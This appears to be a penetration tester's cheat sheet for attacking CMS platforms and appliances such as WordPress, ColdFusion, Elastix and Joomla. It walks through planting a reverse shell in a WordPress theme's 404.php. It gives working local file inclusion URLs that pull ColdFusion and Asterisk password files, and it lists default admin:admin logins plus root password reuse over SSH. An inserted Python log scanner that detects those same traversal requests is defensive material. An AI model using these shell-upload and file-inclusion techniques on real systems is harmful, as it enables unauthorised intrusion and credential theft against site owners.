CMS
Enumerate the version and a few other details
Google the vulnerabilities for that version
WordPress
admin page
Configuration files
Enumerate users
Uploading shell in WP_THEME
1. Log in to the WP dashboard and explore the Appearance tab.
2. Go to the Themes section under Appearance, select Editor, choose the Twenty Fifteen template, and open 404.php.
3. You will see a text area for editing the template; inject your malicious PHP code here to obtain a reverse connection from the web server.
4. Update the file and go to the following URL - http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php
5. You will have your session once the 404.php file executes. :)
Drupal
Droopescan
Find version
/CHANGELOG.txt
Adobe Cold Fusion
Determine version
Version 8 Vulnerability
fckeditor
LFI
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Elastix
Google the vulnerabilities
Default logins are
admin:admin
at /vtigercrm/
Able to upload a shell via the profile photo
2.2.0 - 'graph.php' Local File Inclusion
http://server/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
Note: Most probably this will be the same password for the root user too, so you can SSH in directly with it.
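A defender-side check for the two local file inclusion requests above (the ColdFusion `locale` and vtigercrm `current_language` parameters), added here as an example and not part of the original notes: it scans web access-log lines for query parameters that contain directory traversal or a null byte after percent-decoding, and also catches double-encoded variants. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /vtigercrm/graph.php?current_language=..%2f..%2f..%2fetc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 2048
198.51.100.4 - - [10/Oct/2023:13:57:10 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 4096
198.51.100.9 - - [10/Oct/2023:13:58:44 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 404 128
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A ".." path segment delimited by a slash, backslash or the string boundary.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252f) is exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding for the first suspicious query parameter, else None."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, target, status = match.groups()
    for pair in urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        reasons = []
        if TRAVERSAL_RE.search(value):
            reasons.append("traversal")
        if "\x00" in value:
            reasons.append("null_byte")
        if reasons:
            return {"client": client, "path": urlsplit(target).path,
                    "param": name, "reasons": reasons, "status": int(status)}
    return None

def scan(lines):
    return [f for f in map(inspect_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A finding with status 200 is the one to triage first, since the server answered the traversal request instead of rejecting it.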
Joomla
Admin page -
/administrator
Configuration files
Mambo
Config files
ZyXel
Configuration files